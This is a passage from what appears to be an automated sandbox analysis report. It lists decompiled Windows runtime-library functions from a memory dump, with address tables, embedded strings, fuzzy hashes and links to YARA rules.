Opcode Fuzzy Hash: 91cfedd81b7e1062557a8107f25dcabd331bbc44a9215981488b6f5718ef8e8f
Instruction Fuzzy Hash: 70C1A075D0022ADBDB25DF99E880AAEBBF5FF58704F054429F901BF250E774A841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0154FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0154FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0152EEF0(0x1607b60);
					_t134 =  *0x1607b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1607b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1607b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01526D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E015276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E015B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0151B150();
													}
													_t116 = E015B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E015275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1608638; // 0x0
																	_t122 = L015238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E015276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E015276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0154FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L015270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0154FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0154FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0154FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0154FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0154FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1607b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1607b84 = _t75;
						_t73 = E0152EB70(_t134, 0x1607b60);
						if( *0x1607b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0152FF60( *0x1607b20);
							}
						}
						goto L5;
					}
				}
			}

0x0154fab0
0x0154fab2
0x0154fab3
0x0154fab4
0x0154fabc
0x0154fac0
0x0154fb14
0x0154fb17
0x0154fac2
0x0154fac8
0x0154facd
0x0154fad3
0x0154fad3
0x0154fadd
0x0154fb18
0x0154fb1b
0x0154fb1d
0x0154fb1e
0x0154fb1f
0x0154fb20
0x0154fb21
0x0154fb22
0x0154fb23
0x0154fb24
0x0154fb25
0x0154fb26
0x0154fb27
0x0154fb28
0x0154fb29
0x0154fb2a
0x0154fb2b
0x0154fb2c
0x0154fb2d
0x0154fb2e
0x0154fb2f
0x0154fb3a
0x0154fb3b
0x0154fb3e
0x0154fb41
0x0154fb44
0x0154fb47
0x0154fb4a
0x0154fb4d
0x0154fb53
0x0158bdcb
0x0158bdcb
0x0154fb59
0x0154fb5b
0x0154fb5b
0x0154fb5e
0x0158bdd5
0x0158bdd8
0x00000000
0x0158bdda
0x00000000
0x0158bdda
0x0154fb64
0x0154fb64
0x0154fb64
0x0154fb67
0x0154fb6e
0x0154fb70
0x0154fb72
0x00000000
0x0154fb78
0x0154fb7a
0x0154fb7a
0x0154fb7d
0x0154fb80
0x0158bddf
0x0158bde1
0x00000000
0x0158bde3
0x00000000
0x0158bde3
0x0154fb86
0x0154fb86
0x0154fb86
0x0154fb8b
0x0154fb90
0x0154fb92
0x0154fb94
0x0154fb9a
0x0154fb9b
0x0154fba1
0x0158bde8
0x0158bdeb
0x0158bded
0x0158beb5
0x0158beb5
0x0158bebb
0x0158bebd
0x0158bec3
0x0158bed2
0x0158bedd
0x0158bedd
0x0158beed
0x00000000
0x0158bdf3
0x0158bdfe
0x0158be06
0x0158be0b
0x0158be0d
0x0158be0f
0x0158be14
0x0158be19
0x0158be20
0x0158be25
0x0158be27
0x0158be35
0x0158be39
0x0158be46
0x0158be4f
0x0158be54
0x0158be56
0x0158bef8
0x0158bef8
0x00000000
0x0158be5c
0x0158be5c
0x0158be60
0x00000000
0x0158be66
0x0158be66
0x0158be7f
0x0158be84
0x0158be87
0x0158be89
0x0158be8b
0x0158be99
0x0158be9d
0x0158bea0
0x0158beac
0x0158beaf
0x0158beb1
0x0158beb3
0x0158beb3
0x00000000
0x0158bea2
0x0158bea2
0x00000000
0x0158bea2
0x0158be8d
0x0158be8d
0x0158be92
0x00000000
0x0158be92
0x0158be8b
0x0158be60
0x0158be3b
0x0158be3b
0x0158be3e
0x00000000
0x0158be40
0x0158be40
0x0158be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0158be44
0x0158be3e
0x0158be29
0x0158be29
0x00000000
0x0158be29
0x0158be27
0x00000000
0x0154fba7
0x0154fba7
0x0154fbab
0x0158bf02
0x0154fbb1
0x0154fbb1
0x0154fbb8
0x0154fbbd
0x0154fbbd
0x0154fbbf
0x0154fbbf
0x0154fbc5
0x0154fbcb
0x0154fbf8
0x0154fbf8
0x0154fbfa
0x00000000
0x0154fc00
0x0154fc00
0x0154fc03
0x00000000
0x0154fc09
0x0154fc09
0x0154fc0f
0x0154fc15
0x0154fc23
0x0154fc23
0x0154fc25
0x0154fc27
0x0154fc75
0x0154fc7c
0x0154fc84
0x00000000
0x0154fc29
0x0154fc29
0x0154fc2d
0x0154fc30
0x0158bf0f
0x00000000
0x0154fc36
0x0154fc38
0x0154fc3b
0x0154fc41
0x0158bf17
0x0158bf19
0x0158bf48
0x0158bf4b
0x00000000
0x0158bf1b
0x0158bf22
0x0158bf24
0x0158bf26
0x00000000
0x0158bf2c
0x0158bf37
0x0158bf39
0x0158bf3b
0x00000000
0x0158bf41
0x0158bf41
0x0158bf41
0x0158bf41
0x0158bf45
0x00000000
0x0158bf45
0x0158bf3b
0x0158bf26
0x00000000
0x0154fc47
0x0154fc47
0x0154fc49
0x0154fcb2
0x0154fcb4
0x0154fcb6
0x0154fcdc
0x0154fcdc
0x00000000
0x0154fcb8
0x0154fcc3
0x0154fcc5
0x0154fcc7
0x00000000
0x0154fcc9
0x0154fcc9
0x0154fccd
0x00000000
0x0154fccd
0x0154fcc7
0x00000000
0x0154fc4b
0x0154fc4b
0x0154fc4e
0x0154fc4e
0x0154fc51
0x0154fc51
0x0154fc54
0x0154fc5a
0x0154fc5c
0x0154fc5f
0x0154fc61
0x0154fc63
0x0154fc65
0x0154fc67
0x0154fc6e
0x0154fc72
0x0154fc72
0x0154fc72
0x0154fc72
0x0154fc67
0x0154fc61
0x00000000
0x0154fc5a
0x0154fc49
0x0154fc41
0x0154fc30
0x0154fc27
0x0154fc03
0x0154fbcd
0x0154fbd3
0x0154fbd9
0x0154fbdc
0x0154fbde
0x0154fc99
0x0154fc9b
0x0154fc9d
0x0154fcd5
0x0154fcd5
0x0154fc89
0x0154fc89
0x00000000
0x0154fc9f
0x0154fc9f
0x0154fca3
0x00000000
0x0154fca3
0x00000000
0x0154fbe4
0x0154fbe4
0x0154fbe4
0x0154fbe4
0x0154fbe9
0x0154fbf2
0x00000000
0x0154fbf2
0x0154fbde
0x0154fbcb
0x0154fbab
0x0154fc8b
0x0154fc8b
0x0154fc8c
0x0154fb80
0x0154fb72
0x0154fb5e
0x0154fc8d
0x0154fc91
0x0154fadf
0x0154fadf
0x0154fae1
0x0154fae4
0x0154fae7
0x0154faec
0x0154faf8
0x0154fb00
0x0154fb07
0x0154fb0f
0x0154fb0f
0x0154fb07
0x00000000
0x0154faf8
0x0154fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0158BE0F

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 7818c48b99b668ec3e95a965cab3a5f3b0771760fd1c75729ec0f0bcbcab7b71
Instruction ID: 736bb1f7c7cfe1ef399399abc76809f2c1dfd1d6ea736b0e0b717a570eb7e53e
Opcode Fuzzy Hash: 7818c48b99b668ec3e95a965cab3a5f3b0771760fd1c75729ec0f0bcbcab7b71
Instruction Fuzzy Hash: 87A1F371B006069FEB26DF6CC850B7EB7A8BF49718F04456AE946DF681DB30D801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01512D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01512D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1605350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1607bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E015597C0();
				}
				if( *0x16079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x16079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01541624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01537D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E015AFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01559520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0154E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0156DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1606901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1606901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01559980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E015595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01537D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01537D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01597016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E015AFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1605350;
							if(_t109 != 0x1605350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E015AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E015A5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01512d8a
0x01512d8a
0x01512d92
0x01512d96
0x01512d9e
0x01512da0
0x01512da3
0x01512da5
0x01512da8
0x01512dab
0x01512db2
0x0156f9aa
0x0156f9ab
0x0156f9ae
0x0156f9ae
0x01512db8
0x01512dc2
0x0156f9b9
0x0156f9be
0x0156f9bf
0x0156f9bf
0x01512dcf
0x0156f9c9
0x01512dd5
0x01512dd5
0x01512dd5
0x01512dde
0x01512de1
0x01512e70
0x01512e72
0x01512e72
0x01512de7
0x01512deb
0x01512e7c
0x01512e83
0x01512e85
0x01512e8b
0x01512e8d
0x01512e92
0x01512e92
0x01512e85
0x01512df1
0x01512df7
0x01512df9
0x01512df9
0x01512dfc
0x01512dff
0x01512e02
0x00000000
0x01512e05
0x01512e0c
0x0156f9d9
0x01512e12
0x01512e12
0x01512e12
0x01512e1a
0x0156f9e3
0x0156f9e9
0x0156f9f0
0x0156f9f6
0x0156f9f8
0x0156f9f8
0x0156f9f0
0x01512e23
0x0156fa02
0x0156fa03
0x0156fa05
0x0156fa06
0x00000000
0x01512e29
0x01512e29
0x01512e2e
0x01512e34
0x01512e3e
0x00000000
0x00000000
0x01512e44
0x01512e47
0x01512e4d
0x00000000
0x00000000
0x01512e4f
0x01512e54
0x00000000
0x00000000
0x01512e5a
0x01512e5f
0x01512e9a
0x01512ea4
0x01512ea5
0x01512ea8
0x01512eaf
0x01512eb2
0x01512eb5
0x0156fae9
0x0156faeb
0x0156faed
0x0156faef
0x0156faf7
0x0156faf8
0x0156fafd
0x0156faff
0x0156fb04
0x0156fb04
0x0156faff
0x01512ec0
0x01512ec4
0x01512ec6
0x01512ec8
0x0156fb14
0x0156fb18
0x0156fb1e
0x0156fb21
0x0156fb21
0x01512ece
0x01512ece
0x01512ece
0x01512ed7
0x01512e61
0x01512e63
0x0156fa6b
0x0156fa71
0x0156fa76
0x0156fa78
0x0156fa8a
0x0156fa7a
0x0156fa83
0x0156fa83
0x0156fa8f
0x0156fa91
0x0156fa97
0x0156fa9d
0x0156faa4
0x0156faaa
0x0156faaf
0x0156fab1
0x0156fac3
0x0156fab3
0x0156fabc
0x0156fabc
0x0156fac8
0x0156facb
0x0156fadf
0x0156fadf
0x0156facb
0x0156faa4
0x0156fa91
0x01512e6f
0x01512e6f
0x01512e5f
0x0156fa13
0x0156fa15
0x0156fa17
0x0156fa1f
0x0156fa21
0x0156fa22
0x0156fa25
0x0156fa28
0x0156fa2f
0x0156fa2f
0x0156fa2a
0x0156fa2a
0x0156fa2a
0x0156fa31
0x0156fa34
0x0156fa36
0x0156fa3c
0x0156fa3e
0x0156fa41
0x0156fa43
0x0156fa45
0x0156fa45
0x0156fa41
0x0156fa3c
0x0156fa4a
0x0156fa4f
0x0156fa51
0x0156fa53
0x0156fa56
0x0156fa5b
0x0156fa5e
0x00000000
0x0156fa5e
0x01512e23

Strings

RTL: Re-Waiting, xrefs: 0156FA4A

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: b742c16b020dc0adc510e13d69ee3ffacb59232815ef653f0accc64efbfec37e
Instruction ID: db622011c652d4626569bb0dcc31d95543fc560d50ece3c5c9def458d3e2ba05
Opcode Fuzzy Hash: b742c16b020dc0adc510e13d69ee3ffacb59232815ef653f0accc64efbfec37e
Instruction Fuzzy Hash: 7C610031E006469FEB22DB6CD894B7EBBE9FB84324F240A6AD9119F2C1C7749941C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 015E0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E015E0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E015DFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E015E1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01559730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E015DA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E015DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1608b04 >> 0x14) + (_v44 -  *0x1608b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01537D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E015D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01537D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E015CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1608724 & 0x00000008) != 0) {
						E015D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E015E15B5(0x1608ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x015e0eb7
0x015e0eb9
0x015e0ec0
0x015e0ec2
0x015e0ecd
0x015e105b
0x015e105b
0x015e1061
0x015e1066
0x015e1066
0x015e106b
0x015e1073
0x015e1073
0x015e0ed3
0x015e0ed6
0x015e0edc
0x015e0ee0
0x015e0ee7
0x015e0ef0
0x015e0ef5
0x015e0efa
0x015e0efc
0x015e0efd
0x015e0f03
0x015e0f04
0x015e0f06
0x015e0f07
0x015e0f09
0x015e0f0e
0x015e0f14
0x015e0f23
0x015e0f2d
0x015e0f34
0x015e0f34
0x015e0f14
0x015e0f52
0x00000000
0x00000000
0x015e0f58
0x015e0f73
0x015e0f74
0x015e0f79
0x015e0f7d
0x015e0f80
0x015e0f86
0x015e0fab
0x015e0fb5
0x015e0fc6
0x015e0fd1
0x015e0fe3
0x015e0fd3
0x015e0fdc
0x015e0fdc
0x015e0feb
0x015e1009
0x015e1009
0x015e1015
0x015e1027
0x015e1017
0x015e1020
0x015e1020
0x015e102f
0x015e103c
0x015e103c
0x015e1048
0x015e1050
0x015e1050
0x015e1055
0x00000000
0x015e1055
0x015e0f88
0x015e0f9e
0x015e0fa2
0x015e0fa9
0x00000000
0x00000000
0x00000000
0x015e0fa9
0x00000000

Strings

`, xrefs: 015E0F16

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: ed80176c7e17fd9a02a2f15ba634797aa153dce6054f0bee2d2d14eaf11cd8f5
Instruction ID: 751c6a2f74353965b32dc2c615ebb3385a27b3ec0afb11dd7ce875a50919123c
Opcode Fuzzy Hash: ed80176c7e17fd9a02a2f15ba634797aa153dce6054f0bee2d2d14eaf11cd8f5
